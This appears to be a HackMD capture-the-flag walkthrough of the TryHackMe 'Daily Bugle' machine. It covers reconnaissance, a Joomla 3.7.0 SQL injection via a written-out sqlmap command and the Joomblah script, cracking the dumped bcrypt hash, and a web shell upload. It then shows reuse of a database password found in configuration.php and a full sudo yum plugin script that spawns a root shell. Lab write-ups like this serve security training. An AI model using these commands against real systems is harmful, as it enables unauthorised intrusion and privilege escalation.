Daily Bugle - HackMD

# Daily Bugle ###### tags: `vulnerableMachine` `linuxMachine` [TOC] ## Recon ![](https://i.imgur.com/Kj1CXxq.png) port -> 22 ssh , 80 port OS: cent OS ![](https://i.imgur.com/cuZr1FC.png) ``` spider man ``` ### check favicon ![](https://i.imgur.com/BVJbJoG.png) ``` http://10.10.131.129/templates/protostar/favicon.ico ``` ![](https://i.imgur.com/sr4iCZL.png) ``` d41d8cd98f00b204e9800998ecf8427e ``` ![](https://i.imgur.com/Fw9RZUn.png) ``` d41d8cd98f00b204e9800998ecf8427e:Zero byte favico ``` Zero byte framework ### Walking ``` ==> DIRECTORY: http://10.10.131.129:80/administrator/ ==> DIRECTORY: http://10.10.131.129:80/bin/ ==> DIRECTORY: http://10.10.131.129:80/cache/ ==> DIRECTORY: http://10.10.131.129:80/components/ ==> DIRECTORY: http://10.10.131.129:80/images/ ==> DIRECTORY: http://10.10.131.129:80/includes/ ==> DIRECTORY: http://10.10.131.129:80/language/ ==> DIRECTORY: http://10.10.131.129:80/layouts/ ==> DIRECTORY: http://10.10.131.129:80/libraries/ ==> DIRECTORY: http://10.10.131.129:80/media/ ==> DIRECTORY: http://10.10.131.129:80/modules/ ==> DIRECTORY: http://10.10.131.129:80/plugins/ + http://10.10.131.129:80/robots.txt (CODE:200|SIZE:836) ==> DIRECTORY: http://10.10.131.129:80/templates/ ==> DIRECTORY: http://10.10.131.129:80/tmp/ ``` http://10.10.131.129/administrator/ ->Joom framework ### Using joom scanner https://github.com/OWASP/joomscan Joom version ->3.7.0 ![](https://i.imgur.com/mv3XJQ4.png) ![](https://i.imgur.com/RywjXyK.png) ``` http://10.10.131.129/administrator/components http://10.10.131.129/administrator/modules http://10.10.131.129/administrator/templates http://10.10.131.129/administrator/includes http://10.10.131.129/administrator/language http://10.10.131.129/administrator/templates ``` Exploit-DB ![](https://i.imgur.com/qXgTG6F.png) ![](https://i.imgur.com/a0BBEZ9.png) ``` POST /administrator/index.php HTTP/1.1 Host: 10.10.131.129 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 108 Origin: http://10.10.131.129 Connection: close Referer: http://10.10.131.129/administrator/ Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=e2lfgvsb92kc3k53278prs9uk2; 2b01af51830ca9615359108de04d9ca1=7jjmlk2dp3v3mpbi5df030giu0 Upgrade-Insecure-Requests: 1 username=meow&passwd=meow&option=com_login&task=login&return=aW5kZXgucGhw&81e1634de28518ec230400f408a45bd5=1 ``` ## Getting Initial Access ## Way 1: Using SQLmap https://www.exploit-db.com/exploits/42033 SQL exploit command ``` sqlmap -u "http://&ltremote-ip>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' --dump ``` It's not unstable ## Way 2: python script https://github.com/XiphosResearch/exploits/blob/master/Joomblah/joomblah.py this script program have a type error ``` result += value -> result += value.decode('utf-8') ``` ![](https://i.imgur.com/m3ISgF1.png) ``` Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', ''] ``` Username -> jonah Hash password -> $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm ### Check hash type ![](https://i.imgur.com/3S2d0NV.png) hash type -> bcrypt ``` password->spiderman123 ``` Login Success ![](https://i.imgur.com/BODLtw9.png) SHELL upload ![](https://i.imgur.com/ClKLKf7.png) ![](https://i.imgur.com/JYZDjnr.png) ## Privilege Elevation Apache -> home User ![](https://i.imgur.com/Zlb90Xj.png) ``` jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash ``` -> JJameson User we could find out the web configure file It always have some credentials to login in Database HAHA ``` Apache cd /var/www/html cat configuration.php ``` ``` public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'root'; public $password = 'nv5uz9r3ZEDzVjNu'; public $db = 'joomla'; public $mailfrom = 'jonah@tryhackme.com'; public $fromname = 'The Daily Bugle'; public $sendmail = '/usr/sbin/sendmail'; ``` Try login by ssh User -> jjameson password -> nv5uz9r3ZEDzVjNu ![](https://i.imgur.com/kQEMFFN.png) login success SUDO prvilege yum ``` TF=$(mktemp -d) cat >$TF/x<<EOF [main] plugins=1 pluginpath=$TF pluginconfpath=$TF EOF cat >$TF/y.conf<<EOF [main] enabled=1 EOF cat >$TF/y.py<<EOF import os import yum from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1' def init_hook(conduit): os.execl('/bin/sh','/bin/sh') EOF sudo yum -c $TF/x --enableplugin=y ``` TF=$(mktemp -d) -> 創建一個臨時目錄，並將目錄的路徑存儲在變數 `TF` 中。這段腳本的整體作用是在利用 yum 套件管理器的外掛程式功能，將 yum 外掛程式安裝到系統中，並且在啟動外掛程式時呼叫一個 shell 程式 ![](https://i.imgur.com/H4yxnBQ.png)